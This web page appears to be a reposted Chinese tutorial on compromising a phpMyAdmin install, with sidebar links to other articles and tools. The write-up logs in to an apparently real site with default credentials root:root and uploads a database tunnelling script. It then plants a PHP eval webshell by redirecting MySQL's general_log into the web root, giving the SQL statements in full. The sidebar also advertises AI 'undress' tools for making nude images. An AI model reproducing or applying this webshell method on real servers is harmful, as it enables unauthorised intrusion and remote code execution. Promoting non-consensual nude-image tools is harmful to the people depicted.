Share a penetration test by Phpmyadmin-phpMyAdmin-php.cn

Home

Database

phpMyAdmin

Share a penetration test by Phpmyadmin

藏色散人

Mar 12, 2021 am 11:55 AM

phpmyadmin

The following is a penetration test of Phpmyadmin from the tutorial column of phpmyadmin. I hope it will be helpful to friends in need!

First scan a certain site through directory scanning and find that phpmyadmin exists. Try the weak password root: root is lucky to get in

##Try to use When Navicate connects to the database, it returns that remote connection to the database is prohibited:

However, the remote command execution found that the local 3306 port was open, so it tried to connect through a proxy:

Upload the ntunnel_mysql.php file (database proxy script) in the Navicat installation directory to any web site directory on the target server (uploaded later after getshell)

Upload to the D:/phpStudy/WWW directory to access http://XXX/ntunnel_mysql.php Test successful

Test connection:

(At this time, open Navicat locally to configure the http connection. The channel address here is the url you visited above. To put it bluntly, On the agent side, check the box to use base64 encoding to prevent waf from causing trouble. Then write localhost as the host name, and write the account of the lnmp01 local database user as the account password, because you need to connect to the local mysql of lnmp01)

Phpmyadmin Get Shell:

Use log files

mysql version 5.0 or above will create log files and modify the global log file Variables can also be used with getshell. But you must also have read and write permissions on the generated logs.

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file=&#39;D:/phpStudy/WWW/test1234.php&#39;;  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件

Chopper connection:

The above is the detailed content of Share a penetration test by Phpmyadmin. For more information, please follow other related articles on the PHP Chinese website!

Statement

This article is reproduced at:cnblogs. If there is any infringement, please contact admin@php.cn delete

phpMyAdmin: Enhancing Database ProductivityApr 13, 2025 am 12:04 AM

phpMyAdmin improves database productivity through an intuitive web interface: 1. Simplify the creation and management of databases and tables; 2. Support complex SQL queries and data operations; 3. Provide relationship view functions to manage table relationships; 4. Optimize performance and best practices to improve efficiency.

phpMyAdmin's Purpose: Managing MySQL Databases with EaseApr 12, 2025 am 12:14 AM

phpMyAdmin is a web-based MySQL database management tool. 1. It supports basic CRUD operations and advanced features such as database design and performance optimization. 2. Run through the web server, accept user input and convert it to MySQL commands. 3. The basic usage includes creating a database, and the advanced usage supports query optimization. 4. Common errors such as insufficient permissions can be solved by checking user permissions. 5. Performance optimization includes index optimization, query optimization and database design.

The Roles of MySQL and phpMyAdmin: A Detailed BreakdownApr 11, 2025 am 12:14 AM

The roles of MySQL and phpMyAdmin are to store and manage data and provide user-friendly database management interfaces. MySQL performs data operations through SQL, phpMyAdmin interacts with MySQL through HTTP requests, and converts user operations into SQL commands.

phpmyadmin connection to databaseApr 10, 2025 pm 11:09 PM

How to connect to the database through phpMyAdmin: Visit the phpMyAdmin website and log in with credentials. Select the database to connect to. Under the Actions tab, select the Export option. Configure export settings and select format, table, and data range. Save the exported file. Select the Import tab in the target database and browse the exported files. Click the "Execute" button and use the "Query" tab to verify that the import is successful.

How to connect to oracle by phpmyadminApr 10, 2025 pm 11:03 PM

Connect phpMyAdmin to the Oracle database by following the steps: 1. Install the Oracle driver; 2. Create a database connection, including host, username, password, port, and type; 3. Save settings to establish a connection; 4. Select the connected Oracle database from phpMyAdmin to manage and use it.

phpmyadmin creates data tableApr 10, 2025 pm 11:00 PM

To create a data table using phpMyAdmin, the following steps are essential: Connect to the database and click the New tab. Name the table and select the storage engine (InnoDB recommended). Add column details by clicking the Add Column button, including column name, data type, whether to allow null values, and other properties. Select one or more columns as primary keys. Click the Save button to create tables and columns.

phpmyadmin connection mysqlApr 10, 2025 pm 10:57 PM

How to connect to MySQL using phpMyAdmin? The URL to access phpMyAdmin is usually http://localhost/phpmyadmin or http://[your server IP address]/phpmyadmin. Enter your MySQL username and password. Select the database you want to connect to. Click the "Connection" button to establish a connection.

phpmyadmin automatic growth idApr 10, 2025 pm 10:54 PM

Steps to set up an automatic growth ID in phpMyAdmin: Open phpMyAdmin and connect to the database. Select the table to create the automatic growth ID. In the Structure tab, check the Automatically grow check box in the Primary Key section. Enter the Start and End values for the Automatically Grow ID in the From and To fields. Click the "Save" button. Advantages of setting up an automatic growth ID include: Simplified data insertion. Ensure uniqueness. Optimize performance. Easy to identify. Things to note: Ensure that the range of automatic growth IDs is large enough. Repeat values may not be possible

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

2 weeks agoByDDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

WWE 2K25: How To Unlock Everything In MyRise

4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

MinGW - Minimalist GNU for Windows

This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software